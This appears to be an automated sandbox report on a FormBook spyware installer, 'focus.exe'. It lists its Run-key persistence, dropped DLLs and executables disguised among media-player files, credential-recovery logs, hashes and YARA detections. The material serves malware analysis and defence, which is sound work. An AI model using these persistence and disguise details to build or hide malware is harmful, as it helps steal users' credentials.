Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@12/15@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 45.7% (good quality ratio 42.5%) Quality average: 72.2% Quality standard deviation: 30.6%
HCA Information:	Successful, ratio: 78% Number of executed functions: 124 Number of non-executed functions: 339
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.43.139.144, 104.42.151.234, 20.50.102.62, 23.218.208.56, 92.122.213.247, 92.122.213.194, 20.54.26.129, 205.185.216.42, 205.185.216.10, 2.20.143.16, 2.20.142.209, 20.82.209.183, 20.82.210.154 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:54:00	API Interceptor	794x Sleep call for process: player-toolkit.exe modified
23:55:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run K6M8V4IX5F C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
23:55:39	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run K6M8V4IX5F C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RACKSPACEUS	executable.2772.exe	Get hash	malicious	Browse	23.253.46.64
	SwiftReport_11371201183146224.exe	Get hash	malicious	Browse	184.106.54.10
	IMG_INVOICE_6628862572.exe	Get hash	malicious	Browse	173.203.187.10
	PI.exe	Get hash	malicious	Browse	173.203.187.10
	swift copy.exe	Get hash	malicious	Browse	173.203.187.10
	product specification.xlsx	Get hash	malicious	Browse	162.209.114.201
	Proforma HBK Equip Req ozen-global 20.04.2021 cc (1).xlsx.exe	Get hash	malicious	Browse	146.20.161.10
	INVOICE N. 7.pdf.exe	Get hash	malicious	Browse	184.106.54.10
	WaybillDoc_5736357561.pdf.exe	Get hash	malicious	Browse	184.106.54.10
	VWR CI 160421.xlsx.exe	Get hash	malicious	Browse	173.203.187.10
	NdBLyH2h5d.exe	Get hash	malicious	Browse	162.209.114.201
	RFQ12-ADM2020pdf.exe	Get hash	malicious	Browse	23.253.11.194
	f1uK8cmWpt.dll	Get hash	malicious	Browse	209.20.87.138
	JmtlihbjqE.dll	Get hash	malicious	Browse	209.20.87.138
	GMLce4kiLh.dll	Get hash	malicious	Browse	209.20.87.138
	lbL6XqqqM3.dll	Get hash	malicious	Browse	209.20.87.138
	ju3KXnbV9b.dll	Get hash	malicious	Browse	209.20.87.138
	ofBzBALmBi.dll	Get hash	malicious	Browse	209.20.87.138
	executable.2772.exe	Get hash	malicious	Browse	23.253.46.64
	JRTpdf.exe	Get hash	malicious	Browse	184.106.42.192

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll	delZYToJxe.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\DB1 Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\0NN3-705\0NNlogim.jpeg Download File
Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	106124
Entropy (8bit):	7.929012201389515
Encrypted:	false
SSDEEP:	3072:XAaIwYgckzhMWoUXYJvFSVmJuff2DKeKGB4PFl5TC1WgsdU2lG:XFFYHkzhMWzgv8VmJuGDrKBPdldnlG
MD5:	7E803876142895EAB1A3E3ADE118C897
SHA1:	2F98E6DD066EFAE230AA0C8461336E8557A76218
SHA-256:	5545C92F48DA83A824183A492C92BA814355383C4D7526EAFB32840E3AEB41F3
SHA-512:	14E7281844B6958C6D89AADB8618B7E37F9A184A18EF66476A875C112AC8D16B5F563A92A2298843947641CFCB4CC08B6517A903E4BCD6017C84C198152419A4
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.\|..).?.H.'.\|....).?m.....h.t......\|4.%...d....

C:\Users\user\AppData\Roaming\0NN3-705\0NNlogrg.ini Download File
Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	2.7883088224543333
Encrypted:	false
SSDEEP:	3:rFGQJhIl:RGQPY
MD5:	4AADF49FED30E4C9B3FE4A3DD6445EBE
SHA1:	1E332822167C6F351B99615EADA2C30A538FF037
SHA-256:	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
SHA-512:	EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
Malicious:	false
Reputation:	high, very likely benign file
Preview:	....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\0NN3-705\0NNlogri.ini Download File
Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.8420918598895937
Encrypted:	false
SSDEEP:	3:+slXllAGQJhIl:dlIGQPY
MD5:	D63A82E5D81E02E399090AF26DB0B9CB
SHA1:	91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256:	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512:	38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious:	true
Reputation:	high, very likely benign file
Preview:	....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\0NN3-705\0NNlogrv.ini Download File
Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	210
Entropy (8bit):	3.504619219205926
Encrypted:	false
SSDEEP:	6:tGQPYlIaExGNlGcQga3Of9y96GO4GlmFr5sEoY:MlIaExGNYvOI6x4RCY
MD5:	B13CDE0DBE0EB58127F97F55B6456633
SHA1:	8DABEAB2067C685BCE09EA43D2AA3A5CBBBB53AF
SHA-256:	31B5179063BFD2E75CF97B7A1103EB35089F8444F373300B93910D29D6D405DF
SHA-512:	24AA3725D4F45142914580BEC3F5D90EFBD250FF7C29FBD5F880D764F543F7FCE081AC3FA5FB469AAFBEA604194CE9B39B796F6BE7BE67F0EF32E91E4E68E5D3
Malicious:	true
Preview:	...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.p.q.n.p.i.b.a.m.o.j.d.i.x.r.....A.u.t.:.......P.a.s.s.:.......

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\OptimFROG.dll Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	88576
Entropy (8bit):	7.860927979329831
Encrypted:	false
SSDEEP:	1536:V/ZK03F4yJtmCR1T1lBRhHdT0oUtbMeQT410/QMe6bdtrRtD:V/owCy623lBRhHdT0fpMeS41kxtd5
MD5:	74F5780527A0CDF9D079648DADE4956C
SHA1:	2913F03BD371350B0F694E6DCEE8C7DBF1C7A6AB
SHA-256:	A1705F7563F39B2F1A3A5AFDFEA8C2BAF2419EEE53B202F22589C85AF07ACD23
SHA-512:	82E07443C58D0F9A9F8AD8BD45643FDB85C32E3AEC9DB4A3FA3BA11E6F6E36A0BD1E7E1B63E0901DF76A4427C16744B7E692E2B2253C9E79EE6DC6871F648EF5
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........J.Qe$.Qe$.Qe$..my.Re$.Qe%..e$.BmM.Se$.Ti+.Je$.Ti{.8e$.TiD.ve$.Qe$.We$.Tix.Pe$..nz.Pe$.Ti~.Pe$.RichQe$.........PE..L...v..D...........!.....P.......... ........................................ ..........................................h...4...`.......4...........................................................................................................UPX0....................................UPX1.....P.......L..................@....rsrc................P..............@..............................................................................................................................................................................................................................................................................................................................................................................................1.25.UPX!....

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\ReadMe.txt Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	14211
Entropy (8bit):	5.253839322430561
Encrypted:	false
SSDEEP:	384:/GytFQEuWAUJTN3zLDwm/Fx30pnNbIO6GusyiqE0:eqFQEubUJRUcIuO3uEqv
MD5:	06A5DF751EB0765E69BFB15E12F4C665
SHA1:	7394BF7DF2DDA47BF8D55BFBC880D2A2316054AC
SHA-256:	8B9D97C137459A495936AF47F5140FE75F795728A30E9EC3D8AC9C1CB2E5C65F
SHA-512:	AABD6AA18646192BD49E5343E0129E696B1E003A16E8205FD36AA863BE9C97AADF9AC67BBA96629D21EA5921E89CE6A401E74D9347AA77468F3854DC64E20558
Malicious:	false
Preview:	\|==================================\|..\| Program Name: \| ImgBurn \|..\|==================================\|..\| Author: \| LIGHTNING UK! \|..\|==================================\|....Supported Command Line Switches:....(You can get a basic version of this list via 'ImgBurn.exe /?')..../MODE <PICKER \| READ \| BUILD \| WRITE \| VERIFY \| DISCOVERY>...Used to tell the program which 'Mode' to open up in...../BUILDINPUTMODE <STANDARD \| ADVANCED>...Used to tell the program which 'Build Input Mode' to open up in....Only applies to BUILD mode...../BUILDOUTPUTMODE <DEVICE \| IMAGEFILE>...Used to tell the program which 'Build Output Mode' to open up in....Only applies to BUILD mode...../SRC <Drive Letter \| SCSI Address> \| "<Folder Name>\" \| "<File Name>" \| ALLSECTORS \| <Custom Number Of Sectors>...Used to select the source drive or filename....Drive Letter or SCSI Address applies to READ and VERIFY modes....Folder Name applies to BUILD mode... File Name applies to BUILD and WRITE mode

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	110207
Entropy (8bit):	7.949212262670048
Encrypted:	false
SSDEEP:	3072:/T2x0givE7LLCQv6vRoRJrdEQeX0m9JQfrob:/T2Ogt7ag65kNqjJDb
MD5:	C0B11A7E60F69241DDCB278722AB962F
SHA1:	FF855961EB5ED8779498915BAB3D642044FC9BB1
SHA-256:	A8D979460E970E84EACCE36B8A68AE5F6B9CC0FE16E05A6209B4EAD52B81B021
SHA-512:	CB040ACA6592310BFFB72C898B8EB3CA8A46FF2DF50212634C637593C58683C8AB62E0188DA7AEA362E1B063AE5DB55CF4BF474295922AF0AB94A526465CC472
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: delZYToJxe.exe, Detection: malicious, Browse
Preview:	MZ......................@...................................D.... ..PE..L....0.T...........!.........................p............................................@.............................................@...........................................................................<...H...............................................................@..@.rsrc...............................@..@......... .............................@....................................`..`....................................w.....sSk.......<..^........QF. ..\5...%Go... ....Y..y.Jr..v.Jp...b.."?...`......,..b..ASP ...G...@.(.G&2n.4d~.>z...^&.U..N...(.J......I.DA........`..do...4.c.4{.....]w..h..XD$....`C.5..y-..n3.:....-....s....\2.e.lD.....h......\.,...')+(c.i..=8..H..7u..%,P.<v.Z.a..!....z.C0..F_.i........! . ebc....b.]c.ll..:..?...............6q.1........F.M.I.....X.Ma.wAe.......".1.a..`..`C.dNQ.de.B~GN..p......q`.`H....@.Hm....(.o0n{.5.V.^.N...T....],....ap#...9...G.C.j...s

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\changelog.txt Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	42098
Entropy (8bit):	4.870180237729132
Encrypted:	false
SSDEEP:	768:Qcl6h7Ew8IOIA3EMEU1eRT9h5j+vHWrwNgBb:QC6dEwExHGh+NN4b
MD5:	2BED3AF03E707826F71AB5B92BCFB2B0
SHA1:	F5FF391D5E12B27A1FBE7CBEEAFF780C76560B12
SHA-256:	BEEC18BD021ABDE53C6D3504F427232BFCE2BD4804068E96E59EF45BFC75955C
SHA-512:	753878D1856D22B845A91D7838C2E50DA46153FC76CD262ADB3123C2A4A247CFF569FA014324707BC8C8869516FFCDEE13394FBFB4E438E5E5D207C3EB0C6E19
Malicious:	false
Preview:	Trout..Copyright (c) 2008-2015 Jody Holmes (Skwire Empire)..http://skwire.dcmembers.com/fp/?page=trout....+ added..* changed..- deleted..! bug fixed....v1.0.6 build 76 - 2015-08-11.. + Added an "Autoplay on add" feature under Tools > Options > General... (Thanks, mouser).. * Updated BASS and all plugins... ! Fixed some parsing issues with displayed lyrics.....v1.0.6 build 71 - 2013-11-02.. ! "Open file location" didn't work properly if the filename contained.. certain characters. (Thanks, app103)....v1.0.6 build 67 - 2013-06-13.. * Non-contiguous listview selections are now movable with the Ctrl+Up and.. Ctrl+Down hotkeys.....v1.0.6 build 67 - 2013-02-02.. + Added playback support for the Opus audio codec. Tags are not supported.. at this time.....v1.0.6 build 63 - 2012-06-16.. * Shortened filepath displayed in the statusbar to 64 characters... (Thanks, AEN007)....v1.0.6 build 62 - 2012-04-26.. ! Launching the Find Track dialog twice

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\config.ini Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	893
Entropy (8bit):	5.038943515858497
Encrypted:	false
SSDEEP:	12:ZvFupF+j2w9dYoJiey6gfzKN9wtNKVJXL4+UDYzMWnO5069pO+Y6:epcj7+oJTg7K3wzKVxUD0O5069pOS
MD5:	3B801C600EFE11FB785C5FCB4EEDC5B4
SHA1:	D6AEA5576C5339EB5FE97853FCE2D8E0CC7FB225
SHA-256:	14F6E1C5335897F4796A0756CC40DC1FC992D8FB54ADCC052ADDB1A56BAF77CD
SHA-512:	EDEF6D1904D48B95E5D41D0188EE6CE8E026662AFA8B0161C29BD880F05B5CF0A030FF048DDEBC73B6BDE35B89EA4E07FD62F3A273DABEAF91417589269CE252
Malicious:	false
Preview:	[Columns]..View_Col_#=1..View_Col_Artist=1..View_Col_Album=1..View_Col_Title=1..View_Col_Year=1..View_Col_Genre=1..View_Col_Time=1..View_Col_Bitrate=1..View_Col_Size=1..View_Col_Ext=1..View_Col_Path=1..View_Col_Filename=1..View_Col_Composer=1..View_Col_Comment=1..View_Col_Sample=1..View_Col_Channels=1..View_Col_ModDate=1..Width_Col_#=25..Width_Col_Artist=35..Width_Col_Album=41..Width_Col_Title=32..Width_Col_Year=34..Width_Col_Genre=41..Width_Col_Time=35..Width_Col_Bitrate=42..Width_Col_Size=32..Width_Col_Ext=27..Width_Col_Path=34..Width_Col_Filename=54..Width_Col_Composer=59..Width_Col_Comment=56..Width_Col_Sample=47..Width_Col_Channels=56..Width_Col_ModDate=56..Column_Order=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19..[Settings]..Play_Mode=1..LastFM_Enable=0..LibreFM_Enable=0..Vol_Level=25..Remember_Playback_Data=0\|0\|0..[Position]..pos_x=200..pos_y=200..pos_w=978..pos_h=490..

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	PDF document, version 1.7
Category:	dropped
Size (bytes):	388398
Entropy (8bit):	7.7678320111132155
Encrypted:	false
SSDEEP:	6144:EetS46Debi2aV+0/1uF9XCq0PMqv7PDM+gLXs6CsGt5Bp8A5:Z6D0I00/YQq0tvk+gA6C1pf5
MD5:	1CE793BAE7FC355DB78B184804C820E1
SHA1:	6D2D31555A644CC8867D6E196A28F044C355D5FE
SHA-256:	80D27DD800D9561D4AF96998302CB101D201A150B801788B68CD9683C83686E7
SHA-512:	0FAE4272E71A95A1042179C27F014A4FA17AAFF9F0828A37830D4CD1FFAC6AEC8DC1B0C0A6E7FB852D0D746498DCCBD9B656D169405B3B67DFEEFD484565E052
Malicious:	true
Yara Hits:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, Author: JPCERT/CC Incident Response Group
Preview:	%PDF-1.7..%......1 0 obj..<</Pages 2 0 R /Type/Catalog/MarkInfo<</Marked false>>/Lang(fr-FR)/Metadata 46 0 R >>..endobj..2 0 obj..<</Type/Pages/Kids[ 3 0 R 28 0 R ]/Count 2>>..endobj..3 0 obj.<</Type/Page/StructParents 0/Resources<</XObject<</Image27 27 0 R/Image20 20 0 R/Image22 22 0 R/Image24 24 0 R/Image25 25 0 R/Image26 26 0 R>>/ExtGState<</FXE1 47 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]/Font<</F6 18 0 R/F1 5 0 R/F2 7 0 R/F3 9 0 R/F4 11 0 R/F5 13 0 R>>>>/MediaBox[0 0 612 792]/Parent 2 0 R/Contents 4 0 R/Tabs/S/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>>>.endobj.4 0 obj.<</Length 4741/Filter/FlateDecode>>.stream.x..][s...g..<m.S6L.x.:U..$......3..I;...T......H..,{.."U.%^.F......{......\|......lR/O~...........OG).....R.M.n..O....}..=...O.L.O.=YpQ.\K^....5....U"...R'f..$.\|K.dm.\....]...'..ze..lrc.cIA-.5l..M...5...OHl.Z.;.1M"..k"..e/...........q...................^..l.....q......U..../WW.fq]...5.{...?....0m...e.'k.E...A..F%.f.4<...B...YS.}.....Kv..

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2042880
Entropy (8bit):	6.989055847012453
Encrypted:	false
SSDEEP:	49152:4fRMS0uOjfcC+lJTWGiGoFPXYIlgxllH:4fRMvjfcCaEGQ1YI6
MD5:	07B1496D3966896513CE831A71780213
SHA1:	58C30ACE7343F00180478F30922196A8A8E89483
SHA-256:	A7C5A7B9BDD19704E4FB41D37D2EE7D81A6B98CA0381DD78F9E63FA354DEF973
SHA-512:	6CCD8B647FC191A9AC991E2BC9E6C819869585C6D4D9B359EB9E91C73BA0E2F3042E31449CE4237E65D4C54DB19D3EC2B1F23E181CB8304AED1FB19AC69FF942
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 21%, Browse Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........a5..f..f..f...g..f...gy..f...g..f...f..f...g..f...g..f...g...f..f..f_..g..f...g..f...g..f..f...f...g..f...g..f...f..f...g..fRich..f........PE..L..."..`...........!.....L...................`............................................@..........................L..t...tL..........(.......................T..../..p....................1.......0..@............`..<............................text....K.......L.................. ..`.rdata.......`.......P..............@..@.data........`...J...J..............@....rsrc...(...........................@..@.reloc..T............F..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1970176
Entropy (8bit):	6.512980477417573
Encrypted:	false
SSDEEP:	24576:IvH6HpXAw2B2KE0gcb8cQiqPB4JYx6XSmFa7tABvKx/LHn5m7PrujGwhgE6WOfCG:Vp//cI/BWtZQxz5mDru6wZ6WO+
MD5:	1844A4E542EEAC121065EA23B0F1D6B3
SHA1:	0271EC1ED951442657321FF59FD28F9735DC09F5
SHA-256:	4A57B47F159289D846BFF4A5529EC69DDFCD57B088E7381CD9F65270A3467E40
SHA-512:	434F7A45FAF6335ECAB160C00188EC6BC9FC6FDD1C65CAE3D582CB011BEB0016CB8912F69F25DB9EE7046627B942FE0F6EEBF5F09102118FF26E41F759CD9E3A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 29%, Browse Antivirus: ReversingLabs, Detection: 69%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u..f&..f&..f&.e'..f&.c'y.f&.b'..f&..e'..f&N.b'..f&..b'N.f&..c'..f&..c'..f&.g'..f&..g&..f&..o'..f&...&..f&...&..f&..d'..f&Rich..f&........PE..L....z.`.....................$.......P............@..........................`............@.....................................P........e...................`..0.......p...............................@...............0............................text............................... ....rdata..............................@..@.data...x.... ......................@....rsrc....e.......f..................@..@.reloc..0....`......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\res\no_cover.jpg Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	[TIFF image data, little-endian, direntries=4, xresolution=62, yresolution=70, resolutionunit=2, software=Paint.NET v3.36], baseline, precision 8, 65x65, frames 3
Category:	dropped
Size (bytes):	2344
Entropy (8bit):	7.446997849728867
Encrypted:	false
SSDEEP:	48:jWuERAqRT8QXUm9Pe69shbRRXXxOsPUO4gvh4ndFdddi:jJEdRTV79shFBBOUrvCE
MD5:	8D9A983AB3416BE1F888755C508AB6D4
SHA1:	65DE098A3923AF833CDCE647E0FC2B64B0817AAB
SHA-256:	4635E9621F649B94C867AA983AA40CA70210224DB01953A0114A586F134653B1
SHA-512:	DE40035D334444C4D6D8BEF6613430335419CDB8B173386DCCFC78455AAA583D1D4F7DF41B62982EB424B1FFD653B28DBB585C479BCC858AF7328E4BC88D841F
Malicious:	false
Preview:	......JFIF.....`.`.....fExif..II...............>...........F...(...........1.......N.......`.......`.......Paint.NET v3.36....C....................................................................C.......................................................................A.A.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......d...2...~=...m..:......~..._..'...:..}.....m..In&.Kb......K31$.k.?...K/.F.......oC...Z?..../........c.........N...,..............h...N...,..............j..........~.......6............/"..j:....Ll.......... .....ZF....y...g-6.U..5.e../....K..k....WS....#.Ut

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\res\streaming_cover.jpg Download File
Process:	C:\Users\user\Desktop\focus.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 299x279, frames 3
Category:	dropped
Size (bytes):	23123
Entropy (8bit):	7.975513953734144
Encrypted:	false
SSDEEP:	384:qvlUVVUGMDlHL2U6/buO11a0O4kl1W62dkKrKyNSb2RgXuelYH0AOsPC0e5i++l:qdDDDlHLp6DB20O91a3NSb2ou/06PC5c
MD5:	5189FDF08CE5551081D23AD5966E1AEE
SHA1:	9CFA27749EAE4BDF48D572892E51A2E27EB74FAA
SHA-256:	2E2F5B1A459213ED5F368BBD00CB5A642335BEEE2CE56A1C21D4AD25EEE6D393
SHA-512:	E6886D6085EF198EDEC7ADFD4DE6433BD68B1F8A2E0D8247FF136E970FBC034B8B2F4300A018A7F73373594EC84D21A6018D23110D7D7D2F4F17808836E0C7E6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.........................................................................+.."..........................................O.........................."..!2B.1ARb.#Qr.aq.....3...$C...S........4D.%Tc.....................................=.........................!1.A."Qaq..2B......R#3b..4S...r...............?....]..`^h.L(?z..l'..N...o..k.........jr.......s..uCT..g..K.o.......Pw.{)..-)G..0.7j.?4j.~.5.k]..#......._.M..B..Eg...-].P......b......< $..\|...T..5n.MAw5.D`...6..r.%.w4...7j.pG.&.# .s..jAs.V....L.$.H.W.!..5..v...r...4J.a..'.......w.......'...i...?..T,.m......-0..O.C..?z...v#7.~..1...#...t..........s....$... ql5[.EzF4.{.F,.{........uf..m<..,...`e&..F../8...zm.d...9......c.Ww,.4.q].....1..l.)...F..(.D..:...w!v...........4.B.A...0..t..sF<..}.......M.Bl....n.g.).....s.U.4_...6.....AGY.......b........w..?,(NT.agfI..7..i....>....qFh....s...%..@...F.....L...d..g..wD~.-z..eH%.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.957086026055519
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	focus.exe
File size:	2844959
MD5:	5e5cc661beb832b718df6b68d16c0165
SHA1:	af146998a35d9a76b9969b85811d19b2a5cd21a9
SHA256:	bf07af9d0e95551d5599a2c1145adc2fb24595e8451c1340b91969f8577cd212
SHA512:	9fc7dac7483469ef5a22c265948b915282cbf7ce9bf5fb9d6430d83f72f633c93da9d9342cac6fb15530bb21a4233663b1f711511c1e3249aa3c2d6a73f3b391
SSDEEP:	49152:aVEMg20owQaTao3OqijJCc14G5NSDoCw3AkpxEGkgE32f+TbMnO:aSg0owLTL+LJl1/MoCwQaxEGkp2ZO
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...\|......H3............@

File Icon


Icon Hash:	f0e8b0a8b8e8e871

Static PE Info

General
Entrypoint:	0x403348
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
